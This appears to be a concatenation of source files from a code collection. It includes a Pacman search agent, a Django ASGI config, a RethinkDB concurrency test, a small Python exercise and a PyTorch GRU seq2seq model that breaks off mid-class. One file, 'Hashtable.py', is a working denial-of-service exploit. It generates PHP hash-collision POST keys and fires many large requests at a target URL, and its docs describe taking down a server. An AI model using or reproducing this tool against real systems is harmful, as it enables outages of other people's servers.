    def __init__(self):
        self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
        self.searchType = CornersProblem
class FoodSearchProblem:
    """
    A search problem for collecting all of the food (dots) in a Pacman game.

    A search state is a tuple (pacmanPosition, foodGrid) where
    pacmanPosition is an (x, y) pair of integers and foodGrid is a Grid
    (see game.py) of booleans marking remaining food.
    """

    def __init__(self, startingGameState):
        self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
        self.walls = startingGameState.getWalls()
        self.startingGameState = startingGameState
        self._expanded = 0  # DO NOT CHANGE
        self.heuristicInfo = {}  # A dictionary for the heuristic to store information
        self.testVal = 0

    def getStartState(self):
        return self.start

    def isGoalState(self, state):
        # Goal: no food remains anywhere on the grid.
        return state[1].count() == 0

    def getSuccessors(self, state):
        """Return (successor, direction, 1) for each open neighbouring square."""
        self._expanded += 1  # DO NOT CHANGE
        successors = []
        compass = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
        for direction in compass:
            px, py = state[0]
            dx, dy = Actions.directionToVector(direction)
            nx, ny = int(px + dx), int(py + dy)
            if self.walls[nx][ny]:
                continue
            # Copy the grid and eat any food at the new square.
            remaining = state[1].copy()
            remaining[nx][ny] = False
            successors.append((((nx, ny), remaining), direction, 1))
        return successors

    def getCostOfActions(self, actions):
        """Return the cost of a sequence of actions, or 999999 if any move
        walks into a wall."""
        px, py = self.getStartState()[0]
        cost = 0
        for action in actions:
            # Figure out the next state and check whether it is legal.
            dx, dy = Actions.directionToVector(action)
            px, py = int(px + dx), int(py + dy)
            if self.walls[px][py]:
                return 999999
            cost += 1
        return cost
class AStarFoodSearchAgent(SearchAgent):
    """A SearchAgent running A* with foodHeuristic on FoodSearchProblem."""

    def __init__(self):
        self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
        self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
    """
    Heuristic for the FoodSearchProblem.

    Estimate: (maze distance from Pacman to the closest remaining pellet)
    plus (maximum maze distance from that closest pellet to any other
    remaining pellet).  Covering the farthest pellet from the nearest one
    lower-bounds the remaining path, so intermediate pellets do not inflate
    the estimate.  Distances are true maze distances (BFS via mazeDistance),
    keeping the heuristic admissible.

    state: a tuple (pacmanPosition, foodGrid) where foodGrid is a Grid
        (see game.py) of booleans.
    problem: the FoodSearchProblem instance; exposes ``walls``,
        ``startingGameState`` and ``heuristicInfo`` for cached data.
    """
    position, foodGrid = state

    if problem.isGoalState(state):
        return 0

    # asList() yields only the coordinates that still hold food, so no
    # additional membership check is needed (the original re-tested each
    # coordinate against the grid redundantly).
    food = foodGrid.asList()
    if not food:
        return 0

    # Maze distance from Pacman to every remaining pellet.
    distances = [(pos, mazeDistance(pos, position, problem.startingGameState))
                 for pos in food]
    nearPosition, nearDistance = min(distances, key=lambda item: item[1])

    # Farthest pellet from the nearest pellet (includes the nearest itself,
    # which contributes 0 and never wins unless only one pellet remains).
    maxDistance = max(mazeDistance(nearPosition, pos, problem.startingGameState)
                      for pos, _ in distances)
    return nearDistance + maxDistance
class ClosestDotSearchAgent(SearchAgent):
    """Search for all food by repeatedly travelling to the closest dot."""

    def registerInitialState(self, state):
        """Greedily chain shortest paths to the closest dot until no food
        remains, validating each returned move against the legal actions."""
        self.actions = []
        currentState = state
        while currentState.getFood().count() > 0:
            nextPathSegment = self.findPathToClosestDot(currentState)  # The missing piece
            self.actions += nextPathSegment
            for action in nextPathSegment:
                legal = currentState.getLegalActions()
                if action not in legal:
                    t = (str(action), str(currentState))
                    raise Exception('findPathToClosestDot returned an illegal move: %s!\n%s' % t)
                currentState = currentState.generateSuccessor(0, action)
        self.actionIndex = 0
        print('Path found with cost %d.' % len(self.actions))

    def findPathToClosestDot(self, gameState):
        """
        Return a list of actions to the closest dot, starting from gameState.

        Uniform-cost search on AnyFoodSearchProblem: all step costs are 1,
        so UCS expands like BFS and the first food square reached yields a
        shortest path.
        """
        problem = AnyFoodSearchProblem(gameState)
        return search.uniformCostSearch(problem)
class AnyFoodSearchProblem(PositionSearchProblem):
    """
    A search problem for finding a path to any food.

    Identical to PositionSearchProblem (same state space and successor
    function) except for the goal test: any position holding food is a goal.
    Used by ClosestDotSearchAgent.findPathToClosestDot.
    """

    def __init__(self, gameState):
        """Store the food grid plus the usual PositionSearchProblem fields."""
        # Store the food for later reference
        self.food = gameState.getFood()

        # Store info for the PositionSearchProblem (no need to change this)
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        self.costFn = lambda x: 1
        self._visited, self._visitedlist, self._expanded = {}, [], 0  # DO NOT CHANGE

    def isGoalState(self, state):
        """The state is an (x, y) position; it is a goal if it holds food."""
        x, y = state
        return self.food[x][y]
def mazeDistance(point1, point2, gameState):
    """
    Return the maze distance between two points, computed with BFS on a
    PositionSearchProblem.  Pacman's actual position in gameState is
    ignored; both points must be open (non-wall) squares.

    Example usage: mazeDistance((2, 4), (5, 6), gameState)
    """
    walls = gameState.getWalls()
    for name, pt in (('point1', point1), ('point2', point2)):
        assert not walls[pt[0]][pt[1]], '%s is a wall: %s' % (name, str(pt))
    prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
    return len(search.bfs(prob))
|
[
"swaroopkpydisetty@gmail.com"
] |
swaroopkpydisetty@gmail.com
|
c32fdb4787b51913dcb94e2128d2912fad182b06
|
3b871bdc672632e72bbdb72f98c914db660829b4
|
/Django_Project/Django_Project/asgi.py
|
5eb588cf3ef16a21bf99a45c2a9698189ff79917
|
[] |
no_license
|
JasbirCodeSpace/Django-Blog-Web-App
|
b1a58730a17c204fe4c8ad8ab4f3f1d47d5b30e1
|
6af67d03bbec997b972feacb2873efaa542becaa
|
refs/heads/master
| 2022-08-25T23:12:05.591494
| 2020-05-20T07:19:48
| 2020-05-20T07:19:48
| 264,860,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 411
|
py
|
"""
ASGI config for Blog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project's settings module before building the app.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Django_Project.settings')

# Module-level ASGI callable served by ASGI servers (uvicorn, daphne, ...).
application = get_asgi_application()
|
[
"shikhawat.jasbir@gmail.com"
] |
shikhawat.jasbir@gmail.com
|
f0c4e325811d89d928a9cf866949779e8aabab87
|
500ab8c56380741f8ec2e794e42deed6ee9c84df
|
/tests/test_concurrency.py
|
6ca2415aabb7f9516b38a70a1155ac504a23764f
|
[
"Apache-2.0"
] |
permissive
|
antonf/rethinktx
|
1686e11edf92a7d778681b5be526e55b9d11af1d
|
60bbe10ad46030cbcc7727b479ee5bd2355f1fcd
|
refs/heads/master
| 2020-12-05T16:18:36.610124
| 2017-03-19T23:25:43
| 2017-03-19T23:25:43
| 66,806,377
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,436
|
py
|
# Copyright 2016, Anton Frolov <frolov.anton@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import random
import threading
import uuid
import rethinkdb
import rethinktx
import six
from . import mocks
import unittest
LOG = logging.getLogger(__name__)
NUM_ACCOUNTS = 10
NUM_ITERATIONS = 100
NUM_THREADS = 10
def perform_work(conn, account_ids):
    """Run NUM_ITERATIONS random 10-unit transfers between accounts.

    Each iteration moves 10 units from one randomly chosen account to
    another inside a single transaction.  Optimistic-lock conflicts and
    transient availability errors are expected under contention and are
    deliberately ignored.
    """
    for _ in six.moves.range(NUM_ITERATIONS):
        source_id, target_id = random.sample(account_ids, 2)
        try:
            with rethinktx.Transaction(conn) as tx:
                table = tx.table('accounts')
                source = table.get(source_id)
                target = table.get(target_id)
                source['balance'] -= 10
                target['balance'] += 10
                table.put(source_id, source)
                table.put(target_id, target)
        except (rethinktx.OptimisticLockFailure,
                rethinkdb.ReqlAvailabilityError):
            pass
class WorkerThread(threading.Thread):
    # Worker that opens its own connection and runs the transfer workload
    # (perform_work) against the shared set of account ids.

    def __init__(self, account_ids):
        super(WorkerThread, self).__init__()
        self.account_ids = account_ids

    def run(self):
        # Each thread gets a dedicated connection; connections are not
        # shared across threads.
        with mocks.get_connection() as conn:
            perform_work(conn, self.account_ids)
class ConcurrentTransactionsTestCase(unittest.TestCase):
    # Integration test: NUM_THREADS workers perform concurrent zero-sum
    # balance transfers; if transactions are atomic and isolated, the total
    # balance across all accounts must remain zero afterwards.

    def setUp(self):
        super(ConcurrentTransactionsTestCase, self).setUp()
        with mocks.get_connection() as conn:
            # This test needs a real RethinkDB server; skip under the mock.
            if isinstance(conn, mocks.ConnectionMock):
                self.skipTest('Mocked connection not supported')
            self._ensure_provisioned(conn)
            self.account_ids = self._create_accounts(conn, NUM_ACCOUNTS)

    @staticmethod
    def _ensure_provisioned(conn):
        # Create the database/tables if missing (ignoring "already exists"
        # errors), then empty both tables for a clean run.
        def ignore_exc(fn, *args, **kwargs):
            try:
                return fn(*args, **kwargs)
            except Exception:
                LOG.debug('Ignored exception', exc_info=True)
        ignore_exc(rethinkdb.db_create(conn.db).run, conn)
        ignore_exc(rethinkdb.table_create('accounts').run, conn)
        ignore_exc(rethinkdb.table_create('transactions').run, conn)
        rethinkdb.table('accounts').delete().run(conn)
        rethinkdb.table('transactions').delete().run(conn)

    @staticmethod
    def _create_accounts(conn, num_accounts):
        # Insert num_accounts zero-balance accounts in one transaction and
        # return their generated UUID keys.
        account_ids = []
        with rethinktx.Transaction(conn) as tx:
            accounts_tbl = tx.table('accounts')
            for i in six.moves.range(num_accounts):
                key = str(uuid.uuid4())
                account_ids.append(key)
                accounts_tbl.put(key, {'index': i, 'balance': 0})
        return account_ids

    def _total_balance(self):
        # Sum every account balance inside a single transaction so the
        # values form one consistent snapshot.
        with mocks.get_connection() as conn:
            total_balance = 0
            with rethinktx.Transaction(conn) as tx:
                accounts_tbl = tx.table('accounts')
                for account_id in self.account_ids:
                    total_balance += accounts_tbl.get(account_id)['balance']
            return total_balance

    @staticmethod
    def _show_stats():
        # Log how many transactions committed vs. aborted during the run.
        with mocks.get_connection() as conn:
            num_committed = rethinkdb.table('transactions')\
                .filter({'status': 'committed'}).count().run(conn)
            num_aborted = rethinkdb.table('transactions')\
                .filter({'status': 'aborted'}).count().run(conn)
            LOG.info('Committed transactions: %d; Aborted transaction: %d',
                     num_committed, num_aborted)

    def test_concurrent_transactions(self):
        # Start all workers, wait for completion, then verify conservation
        # of money: transfers are zero-sum, so the total must stay 0.
        workers = []
        for _ in six.moves.range(NUM_THREADS):
            worker = WorkerThread(self.account_ids)
            workers.append(worker)
            worker.start()
        for worker in workers:
            worker.join()
        self._show_stats()
        self.assertEqual(0, self._total_balance())
|
[
"frolov.anton@gmail.com"
] |
frolov.anton@gmail.com
|
7aa9a5b9b241ba9dc321a5f3fd7bbbd8dc028125
|
4a2b457f13628ebbf3cd379202b5354fa73bf1e5
|
/Python_3/Modulo 3/4 - Funções em Python/Exercício_100_Funções_para_sortear_e_somar.py
|
37bfc675f73b9a65e8824473012ac0d3d6939c9c
|
[
"MIT"
] |
permissive
|
Jose0Cicero1Ribeiro0Junior/Curso_em_Videos
|
abb2264c654312e6b823a3a9d4b68e0c999ada3f
|
b0bb4922ea40ff0146b5a7e205fe2f15cd9a297b
|
refs/heads/master
| 2022-12-19T19:18:53.234581
| 2020-10-23T12:29:09
| 2020-10-23T12:29:09
| 288,749,473
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 831
|
py
|
#Exercício Python 100: Faça um programa que tenha uma lista chamada números e duas funções chamadas sorteia() e somaPar(). A primeira função vai sortear 5 números e vai colocá-los dentro da lista e a segunda função vai mostrar a soma entre todos os valores pares sorteados pela função anterior.
from random import randint
from time import sleep
def sorteia(lista):
    """Draw five random integers in [1, 10], appending each to ``lista``
    while echoing it with a short dramatic pause."""
    print('Soreteando 5 valores da lista: ', end='')
    for _ in range(0, 5):
        valor = randint(1, 10)
        lista.append(valor)
        print(f'{valor} ', end='', flush=True)
        sleep(0.3)
    print('PRONTO!')
def somaPar(lista):
    """Print the sum of the even values found in ``lista``."""
    soma = sum(valor for valor in lista if valor % 2 == 0)
    print(f'Somando os valores pares de {lista}, temos {soma}')
# Driver: draw five random values into ``números``, then report the sum of
# the even ones.
números = list()
sorteia(números)
somaPar(números)
|
[
"Jose0Cicero1Ribeiro0Junior@outlook.com"
] |
Jose0Cicero1Ribeiro0Junior@outlook.com
|
6cf0811024e03797d865654b2f6c18918e1db095
|
31948daa03278629f577fe9f6dcc19b6480604e7
|
/Hashtable.py
|
1c05fe90bb777f22d4b21f63c636581d14b938f1
|
[
"Unlicense"
] |
permissive
|
SpyEyeFamily/DarkSouL_ReaCt0r
|
4019d607630457ebb8bd0215dafcd39daee4d772
|
8cde5e03b2120237a345a92b20208efb287b6591
|
refs/heads/master
| 2020-12-28T20:20:18.755049
| 2016-09-17T23:17:46
| 2016-09-17T23:17:46
| 68,482,914
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,617
|
py
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server(make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : CLAY TeaM |"
,prog="PHP Hashtable Exploit3r v1.0")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = options.maxpayloadsize*1024*1024
payload = payload[:maxinmb]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
    """Placeholder payload for the ASP target (not implemented)."""
    return "a=a"
def generateJAVAPayload():
    """Placeholder payload for the JAVA target (not implemented)."""
    return "b=b"
def generatePHPPayload():
    # Builds the POST body from 5 colliding two-char tokens expanded to
    # keys of length 8.
    # Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
    # compute entries with collisions in PHP hashtable hash function
    a = computePHPCollisionChars(5)
    return _generatePayload(a, 8);
def _generatePayload(collisionchars, payloadlength):
    """Expand colliding strings into an x-www-form-urlencoded body of colliding keys.

    Taken from:
    https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
    """
    digits = payloadlength                      # "digit" positions per generated key
    radix = len(collisionchars)
    key_count = int(math.floor(math.pow(radix, digits)))
    parts = []
    for value in range(key_count):
        # Write the counter in base `radix`, left-padded with '0'.
        key = _base_convert(value, radix).rjust(digits, "0")
        # Substitute each digit with its colliding replacement string.
        for digit in collisionchars:
            key = key.replace(str(digit), collisionchars[digit])
        parts.append(urllib.quote(key) + "=&")
    return "".join(parts)
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
    """Find *count* two-character strings that share a single DJBX33A hash.

    Picks a random 2-char seed over byte values 1..253, then scans every
    2-char combination for further collisions.  Exits the process when fewer
    than *count* collisions exist for the chosen seed.
    """
    alphabet = ""
    for code in range(1, 254):
        alphabet = alphabet + chr(code)
    candidates = list(itertools.product(alphabet, repeat=2))

    seed = ''.join(random.choice(candidates))
    target_hash = _DJBX33A(seed)
    print("\tValue: %s\tHash: %s" % (seed, target_hash))

    found = {"0": seed}
    n_found = 1
    for candidate in candidates:
        text = ''.join(candidate)
        if text == seed:
            continue
        if _DJBX33A(text) == target_hash:
            print("\tValue: %s\tHash: %s" % (text, target_hash))
            found[str(n_found)] = text
            n_found += 1
            if n_found >= count:
                break

    if n_found != count:
        print("Not enough values found. Please start the script again")
        sys.exit(1)
    return found
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
# PHP hashtable hash
def _DJBX33A(inputstring):
    """DJBX33A (PHP) string hash: base 33, initial value 5381."""
    base, start = 33, 5381
    return _DJBX(inputstring, base, start)
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
    # Entry point: run the command-line driver defined earlier in this file.
    main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
1f7a73fb2528f3c82b8b5f1b7691f0bf7f9c572a
|
6040ec2771a81654ac41f33ce5c4aa7e66d4e5d9
|
/src/파이썬코드(py)/Ch06/code_6_8_2.py
|
5b3b1e11fc54f5ace2dfd3b7cd1cebb773201c31
|
[] |
no_license
|
jinseoo/DataSciPy
|
a3462785ae094530141e66ead8de9e6519fbf193
|
de6127c0741f8d0cfc989e17ba3a5a65004e5d9c
|
refs/heads/master
| 2023-06-25T19:03:22.086126
| 2021-07-27T09:01:41
| 2021-07-27T09:01:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
#
# 따라하며 배우는 파이썬과 데이터과학(생능출판사 2020)
# 6.8 변수의 범위는 어디까지인가, 155쪽
#
def print_counter():
    """Demonstrate scope: the local `counter` shadows the module-level one."""
    counter = 200
    print('counter =', counter)  # value of `counter` inside the function
counter = 100
print_counter()
print('counter =', counter)  # value of `counter` outside the function (unchanged: 100)
|
[
"hojoon1619@gmail.com"
] |
hojoon1619@gmail.com
|
101f2007b71bc63efbdd759b3ee37b183fdd834e
|
a7ba18930a3c84dba19ed0f2f580e6c759e1d0b9
|
/gru_model.py
|
fc37a98f6d4c49e8544c9c4da1aca62c9822d342
|
[] |
no_license
|
soaxelbrooke/twitter-cs-seq2seq
|
4b2dec6badc9f0000702b1fdd0ef17ef91d67d5e
|
c0ca22273150abf76a4a4e2795b7d7d507268d91
|
refs/heads/master
| 2021-07-19T09:05:26.667954
| 2017-10-25T10:32:39
| 2017-10-25T10:32:39
| 106,000,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,672
|
py
|
from collections import deque
import torch
from numpy import ndarray
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
import random
from torch import optim
from tqdm import tqdm
import numpy as np
from typing import NamedTuple
# Hyper-parameter bundle shared by the encoder, decoder and trainer.
# FIX: the runtime type name used to be 'Seq2SeqParams', which did not match
# the name it is bound to; the two are now consistent (affects repr/pickling
# only — positional/keyword construction is unchanged).
Seq2SeqConfig = NamedTuple('Seq2SeqConfig', (
    ('message_len', int),            # fixed token length of every message
    ('batch_size', int),             # rows per training batch
    ('context_size', int),           # GRU hidden-state width
    ('embed_size', int),             # token-embedding width
    ('use_cuda', bool),              # move tensors/modules to the GPU when True
    ('vocab_size', int),             # number of distinct tokens
    ('start_token', str),            # token that begins decoding
    ('encoder_layers', int),         # stacked GRU layers in the encoder
    ('learning_rate', float),        # RMSprop learning rate
    ('teacher_force_ratio', float),  # probability of teacher forcing per batch
))
def build_model(cfg, start_idx, pad_idx):
    # type: (Seq2SeqConfig, int, int) -> GruModel
    """Wire a shared embedding, encoder and decoder into a GruModel."""
    embedding = build_shared_embedding(cfg, pad_idx)
    encoder = GruEncoder(cfg, embedding, 1)
    decoder = GruDecoder(cfg, embedding, 1)
    if cfg.use_cuda:
        # Move both sub-modules (and the shared embedding they hold) to the GPU.
        encoder.cuda()
        decoder.cuda()
    return GruModel(cfg, encoder, decoder, embedding, start_idx)
def build_shared_embedding(cfg, pad_idx):
    # type: (Seq2SeqConfig, int) -> nn.Embedding
    """Build the token-embedding table shared by the encoder and decoder.

    FIX: the `# type:` comment previously sat *after* the docstring, where
    type checkers ignore it; it must directly follow the signature.
    The `pad_idx` row embeds to zeros and receives no gradient.
    """
    return nn.Embedding(cfg.vocab_size, cfg.embed_size, padding_idx=int(pad_idx))
class GruModel:
    """Seq2seq wrapper tying a GRU encoder/decoder pair to training utilities.

    Not an nn.Module itself; it owns the modules, their RMSprop optimizers and
    the NLL loss, and drives teacher-forced training plus greedy prediction.
    """

    def __init__(self, seq2seq_cfg, encoder, decoder, embedding, start_idx):
        # type: (Seq2SeqConfig, GruEncoder, GruDecoder, nn.Embedding, int) -> None
        self.cfg = seq2seq_cfg
        self.encoder = encoder
        self.decoder = decoder
        self.embedding = embedding
        self.start_idx = start_idx      # vocab index of the start-of-sequence token
        self.gradient_clip = 5.0        # max gradient norm applied each step
        self.teacher_force_ratio = seq2seq_cfg.teacher_force_ratio
        self.learning_rate = seq2seq_cfg.learning_rate
        self.encoder_optimizer = optim.RMSprop(self.encoder.parameters(), lr=self.learning_rate)
        self.decoder_optimizer = optim.RMSprop(self.decoder.parameters(), lr=self.learning_rate)
        self.loss_fn = nn.NLLLoss()

    def teacher_should_force(self):
        """Randomly decide (per batch) whether to feed ground-truth tokens to the decoder."""
        return random.random() < self.teacher_force_ratio

    def train_epoch(self, train_x, train_y, experiment=None):
        # type: (ndarray, ndarray) -> float
        """ Trains a single epoch. Returns training loss. """
        progress = tqdm(total=len(train_x))
        loss_queue = deque(maxlen=256)  # rolling window for the progress-bar loss
        train_x = train_x.astype('int64')
        train_y = train_y.astype('int64')
        # Paired (start, end) offsets over whole batches only; the tail
        # remainder smaller than batch_size is dropped.
        idx_iter = zip(range(0, len(train_x) - self.cfg.batch_size, self.cfg.batch_size),
                       range(self.cfg.batch_size, len(train_x), self.cfg.batch_size))
        total_loss = 0
        last_step = 1
        for step, (start, end) in enumerate(idx_iter):
            x_batch = train_x[start:end]
            y_batch = train_y[start:end]
            if (len(x_batch) == 0) or (len(y_batch) == 0):
                break
            x_batch = torch.LongTensor(x_batch)
            y_batch = torch.LongTensor(y_batch)
            if self.cfg.use_cuda:
                x_batch = x_batch.cuda()
                y_batch = y_batch.cuda()
            # Reshape to (message_len, batch_size) — time-major, as the RNNs expect.
            loss = self._train_inner(
                Variable(x_batch.view(-1, self.cfg.batch_size)),
                Variable(y_batch.view(-1, self.cfg.batch_size)),
            )
            if (experiment is not None) and ((step + 1) % 20 == 0):
                experiment.log_metric('loss', np.mean(loss_queue))
            total_loss += loss
            loss_queue.append(loss)
            progress.set_postfix(loss=np.mean(loss_queue), refresh=False)
            progress.update(self.cfg.batch_size)
            last_step = step + 1
        avg_loss = total_loss / last_step
        if experiment is not None:
            experiment.log_metric('loss', avg_loss)
        return avg_loss

    def _train_inner(self, input_var_batch, target_var_batch):
        # type: (ndarray, ndarray) -> float
        """One optimizer step over a single time-major batch; returns per-token loss."""
        self.encoder_optimizer.zero_grad()
        self.decoder_optimizer.zero_grad()
        loss = 0
        enc_hidden_state = self.encoder.init_hidden()
        encoder_outputs, decoder_hidden = self.encoder(input_var_batch, enc_hidden_state)
        # Decoding starts from the start-of-sequence token for every row.
        decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
        if self.cfg.use_cuda:
            decoder_input = decoder_input.cuda()
        should_use_teacher = self.teacher_should_force()
        for input_idx in range(self.cfg.message_len):
            decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
            loss += self.loss_fn(decoder_output, target_var_batch[input_idx, :])
            if should_use_teacher:
                # Teacher forcing: feed the ground-truth token as the next input.
                decoder_input = target_var_batch[input_idx, :]
            else:
                # Get the highest values and their indexes over axis 1
                top_vals, top_idxs = decoder_output.data.topk(1)
                decoder_input = Variable(top_idxs.squeeze())
        loss.backward()
        nn.utils.clip_grad_norm(self.encoder.parameters(), self.gradient_clip)
        nn.utils.clip_grad_norm(self.decoder.parameters(), self.gradient_clip)
        self.encoder_optimizer.step()
        self.decoder_optimizer.step()
        return loss.data.sum() / self.cfg.message_len

    def predict(self, requests):
        # type: (ndarray) -> ndarray
        """ Predict a response for this request """
        x = torch.LongTensor(requests.astype('int64')).view(-1, self.cfg.batch_size)
        if self.cfg.use_cuda:
            x = x.cuda()
        encoder_outputs, decoder_hidden = self.encoder(Variable(x), self.encoder.init_hidden())
        decoder_input = Variable(torch.LongTensor([[self.start_idx]] * self.cfg.batch_size))
        # Pre-filled (message_len, batch_size) buffer of output token ids.
        decoder_outputs = \
            torch.LongTensor([[self.start_idx]] * self.cfg.batch_size * self.cfg.message_len)\
            .view(self.cfg.message_len, self.cfg.batch_size)
        if self.cfg.use_cuda:
            decoder_input = decoder_input.cuda()
        should_use_teacher = self.teacher_should_force()  # NOTE(review): unused here — confirm
        for input_idx in range(self.cfg.message_len):
            decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
            # Greedy decoding: always take the arg-max token.
            top_vals, top_idxs = decoder_output.data.topk(1)
            decoder_input = Variable(top_idxs.squeeze())
            decoder_outputs[input_idx, :] = top_idxs.squeeze()
        return decoder_outputs.numpy().T

    def evaluate(self, test_x, test_y):
        # type: (ndarray, ndarray) -> float
        """ Evaluates model quality on test dataset, returning loss. """
        # NOTE(review): unimplemented stub — the body is only this docstring,
        # so calling it returns None rather than a loss.
class GruEncoder(nn.Module):
    """Uni-directional GRU encoder; returns only the final step's output and hidden layer."""

    def __init__(self, seq2seq_params, embedding, n_layers=1):
        # type: (Seq2SeqConfig, nn.Embedding, int) -> None
        super(GruEncoder, self).__init__()
        self.cfg = seq2seq_params
        # NOTE(review): the `n_layers` argument is ignored in favour of the
        # config's `encoder_layers` — confirm that is intended.
